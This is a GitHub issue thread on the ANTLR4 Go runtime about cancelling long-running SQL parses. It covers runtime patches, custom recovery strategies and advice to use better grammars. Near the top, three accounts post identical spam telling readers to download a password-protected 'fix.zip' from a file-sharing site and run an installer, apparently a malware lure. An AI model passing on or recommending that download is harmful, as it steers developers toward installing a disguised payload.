### ISSUE TITLE
Go Target: Does ANTLR4 support canceled by context?

### ISSUE THREAD

**Issue by h3n4l** [antlr/antlr4#4684]

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by h3n4l** [comment]
I found a useful link https://stackoverflow.com/a/56766893, I will try it.

**Comment by h3n4l** [comment]
Finally, I didn't find a convenient way to achieve this. Instead, I modified the Golang runtime interface, and add context error judgement in closure process which is the most slowest part in our scenario.

https://github.com/bytebase/antlr/blob/cbc3ea49c124976e472da3905eaa3b9da62cd521/parser_atn_simulator.go#L1008

**Comment by jimidle** [comment]
I’m not sure why you need to do this though to be honest? Your posts should be octant with a good grammar…But in your error listener, if you are trying to score early after errors, just set the input stream to the end. Or crest your own recovery strategy that does that. Or extend the input stream to have a go routine that listens for the context, sets a flag and the next LT can just return EOF. You should not need to mess with the runtimeOn Aug 29, 2024, at 07:39, h3n4l ***@***.***> wrote:﻿
Finally, I didn't find a convenient way to achieve this. Instead, I modified the go runtime interface, and add context error judgement in closure process which is the most slowest part in our scenario.
https://github.com/bytebase/antlr/blob/cbc3ea49c124976e472da3905eaa3b9da62cd521/parser_atn_simulator.go#L1008

**Comment by h3n4l** [comment]
Hello @jimidle , we utilize ANTLR to parse SQL. Generally, the parsing process is efficient. However, inefficient grammar, such as ambiguous grammar, can result in significant slowness and memory consumption. We require a mechanism to terminate the parsing process.

**Comment by jimidle** [comment]
> Hello @jimidle , we utilize ANTLR to parse SQL. Generally, the parsing process is efficient. However, inefficient grammar, such as ambiguous grammar, can result in significant slowness and memory consumption. We require a mechanism to terminate the parsing process.
> 
> > Or crest your own recovery strategy that does that. Or extend the input stream to have a go routine that listens for the context, sets a flag and the next LT can just return EOF.
> 
> It appears that this may be an alternative method for utilizing ANTLR to operate with context. I shall give it a try.

You need a better SQL grammar  - I think you are solving the wrong problem. However, if your grammar is so poor that you need LL instead of SLL then remember that even returning EOF as the next token will not stop the ANTLR runtime from finish whatever lookahead it is doing. 

Which dialect are you using, and where did you get your grammar from? All of the SQL grammars in the antlr contributions are not viable, unless @mike-lischke put his SQL grammar in there. I would normally suggest that you use the ambiguity trace to find out what rules are causing you problems, but in the contributed ones, it is pretty much all of them.

Look for Mike's grammar for MySQL and here is one for TSQL, with full tests from the docs for the TSQL version it was originally written at: https://github.com/jimidle/tsqlparser
